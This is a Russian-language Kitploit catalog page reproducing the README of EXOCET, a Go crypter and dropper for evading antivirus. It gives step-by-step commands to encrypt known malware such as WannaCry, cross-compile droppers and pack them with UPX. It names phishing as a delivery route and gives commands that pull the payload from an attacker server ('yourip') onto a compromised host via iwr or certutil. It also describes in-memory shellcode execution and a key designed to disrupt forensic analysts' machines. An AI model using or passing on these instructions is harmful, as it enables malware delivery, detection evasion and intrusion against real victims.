Skip to content
KitploitKITPLOIT
ИнструментыБлог
Log in
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
EXOCET-AV-Evasion — EXOCET - обходящий антивирусы, необнаруживаемый инструмент доставки полезной нагрузки | Kitploit
Инструменты/GitHubGitHub/tanc7/exocet-av-evasion
Фреймворки для эксплойтовГенерация полезной нагрузкиШелл-кодПост-эксплуатацияАнализ вредоносных программКриптографияТестирование на ПроникновениеКомандование и УправлениеОбучение и ОбразованиеRed TeamingГенерация ШеллкодаРазработка Полезной Нагрузки
838147224 лет назадПроверено Kitploit
GitHubtanc7/exocet-av-evasion

EXOCET-AV-Evasion

EXOCET - обходящий антивирусы, необнаруживаемый инструмент доставки полезной нагрузки

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

EXOCET - Инструмент доставки полезной нагрузки, обходящий антивирусы и не обнаруживаемый

Чанг Тан
Сертифицированный AWS Cloud Practitioner и Solutions Architect Associate
[email protected]


Обновленное использование EXOCET

Убедитесь, что вы упаковываете свои полезные нагрузки, чтобы избежать утечки ключа криптера и еще больше затруднить работу аналитиков вредоносного ПО. Коммерческий упаковщик высшего класса, такой как Themida, НЕ требуется. Это вызвало бы еще больше подозрений без сертификата подписи кода. Без сертификата подписи кода в системах Windows автоматически срабатывает SmartScreen. Это правило для всех потенциально нежелательных программ или «ПНП», то есть все вредоносные нагрузки, бэкдоры, геоконы, трояны удаленного доступа и т.д., требуют сертификата подписи кода. Ваши деньги лучше потратить на покупку сертификата подписи кода, чем на какой-нибудь упаковщик высшего класса.

go run exocet.go malware.exe outputmalware.go
env GOOS=windows GOARCH=amd64 build -ldflags "-s -w" outputmalware.go
upx --best outputmalware.exe

Затем доставьте полезную нагрузку на вашу цель. Используя, например, фишинговое письмо, ссылку или, если у вас уже есть доступ к оболочке, доставьте её, разместив свой собственный сервер локально python -m http.server 80' а затем на взломанной машине выполните в командной строке PowerShell iwr -Uri "http://yourip/outputmalware.exe" -OutFile "NotMalware.exe" или certutil.exe -urlcache -split -f http://yourip/outputmalware.exe и затем выполните с помощью outputmalware.exe



EXOCET превосходит модули «Evasive Payloads» от Metasploit, так как EXOCET использует AES-256 в режиме GCM (Galois/Counter Mode). Модули обхода от Metasploit используют легко обнаруживаемое шифрование RC4. Хотя RC4 может расшифровываться быстрее, AES-256 гораздо сложнее для определения намерений вредоносного ПО.

Однако можно использовать Metasploit для создания обходящей обнаружение полезной нагрузки, а затем объединить её с EXOCET. Таким образом, EXOCET расшифрует с помощью AES-256, а затем обходящая полезная нагрузка Metasploit расшифровывается из RC4.

Как и мой предыдущий проект, DarkLordObama, этот инструмент предназначен для использования в качестве средства доставки/запуска, подобно Veil-Evasion.

Проект Dark Lord Obama

Однако EXOCET не ограничивается одной кодовой базой или платформами, на которых работает Python. EXOCET работает на ВСЕХ поддерживаемых платформах и архитектурах, которые поддерживает Go.

Обзор Exocet

EXOCET, по сути, является дроппером вредоносного ПО типа криптер, который может перерабатывать легко обнаруживаемые полезные нагрузки, такие как WannaCry, шифровать их с помощью AES-GCM (Galois/Counter Mode), что более безопасно, чем AES-CBC, и затем создавать файл-дроппер для большинства существующих архитектур и платформ.

В основном...

  1. Он принимает опасное вредоносное ПО, которое теперь обнаруживается антивирусными движками
  2. Затем он шифрует их и создаёт собственный файл Go
  3. Затем этот файл Go можно кросскомпилировать для 99% известных архитектур
  4. При выполнении зашифрованная полезная нагрузка записывается на диск и немедленно выполняется в командной строке
  5. В качестве альтернативы, вместо сброса файла, он выполняет восстановленный шеллкод в памяти с помощью модуля go-memexec от amenzhinsky github.com/amenzhinsky/go-memexec
  6. В разработке пользовательский исполнитель шеллкода, который берет обычный шеллкод на C и после числового преобразования запускает его, создавая новый процесс после выделения правильного виртуального адресного пространства и предоставления ему прав RWX в Windows

Это означает 32-битные и 64-битные архитектуры, и он работает на Linux, Windows, Mac, Unix, Android, iPhone и т.д. Вы берёте что угодно, и я имею в виду ЧТО УГОДНО, например, червя Morris 1988 года, который почти обрушил интернет (использующего уязвимость в демоне прослушивателя fingerd в UNIX), и делаете его снова жизнеспособным кибероружием.

EXOCET написан полностью на Go.

Как использовать

EXOCET, независимо от того, какой бинарный файл вы используете для его запуска, требует Golang. По умолчанию он генерирует файл криптера .go.

  1. Пользователи Windows: Установите Go здесь
  2. Пользователи Linux: выполните sudo apt-get update && sudo apt-get install -y golang
  3. Вы должны установить исходные файлы EXOCET в golang: go get github.com/tanc7/EXOCET-AV-Evasion
  4. Дополнительные зависимости также будут загружены и установлены
  5. Для пользователей Windows и Mac x64 предварительно скомпилированные бинарные файлы находятся в папке /bin

Запуск

go run EXOCET.go detectablemalware.exe outputmalware.go

Ключ генерируется автоматически. Ключ длиной 64 символа и состоит исключительно из перенаправителей конвейера оболочки bash и cmd.exe, чтобы запутать и нарушить попытки подбора ключа, вызывая непредсказуемое, разрушительное поведение на устройстве судебного аналитика.

Для 64-битных целей Windows...

env GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.exe outputmalware.go

И на выходе получается файл outputmalware.exe

Для 64-битных целей MacOS

env GOOS=darwin GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.macho outputmalware.go

Для 64-битных целей Linux

env GOOS=linux GOARCH=amd64 go build -ldflags "-s -w" -o outputMalware.elf outputmalware.go

Смотрите эту ссылку на github для ваших параметров для других операционных систем, таких как Android: Справочник по кросскомпиляции Go

Обратите внимание, что ключ всё ещё можно найти с помощью команды strings. Пожалуйста, используйте команду upx-ucl для упаковки бинарного файла, чтобы скрыть ключ.

Кроме того, есть предварительно собранные бинарные файлы, которые я сделал, что означает, что вам нужно только запустить ./EXOCET или EXOCET-Windows.exe

Правовая информация

Я, Чанг Тан, и создатели основного модуля и подмодулей Exocet, а также включённых в него пакетов, НЕ несём ответственности за неправильное использование этого инструмента. Это всего лишь инструмент для тестирования на проникновение. Вам строго запрещено развёртывать выходные бинарные файлы Exocet против несанкционированных защищённых систем или несанкционированных защищённых государственных систем.

Я знаю, что субъекты угроз из APT41 и NSO Group использовали и/или адаптировали код из этого инструмента, особенно метод go-memexec. Если ко мне обратятся федеральные следователи по поводу неправильного использования этого инструмента, я не беру на себя ответственность.

Это то же самое, что произошло с разработчиками Mimikatz и PowerShell Empire (которые прекратили собственную разработку, осознав её использование субъектами угроз). Преемники подхватили разработку Empire, и существуют бесплатные альтернативы, такие как Covenant C2.

Живая демонстрация EXOCET

Причина названия

4 мая 1982 года во время Фолклендской войны эскадрилья аргентинских Super Etendard запустила французскую ракету Exocet по HMS Sheffield. Несмотря на попытки Королевского флота остановить ракету, одна из них поразила цель, потопив Sheffield. Этот инцидент буквально поставил Аргентину на карту как демонстрация силы против глобальной колониальной державы.

Новостная статья о потоплении HMS Sheffield

Скачать инструмент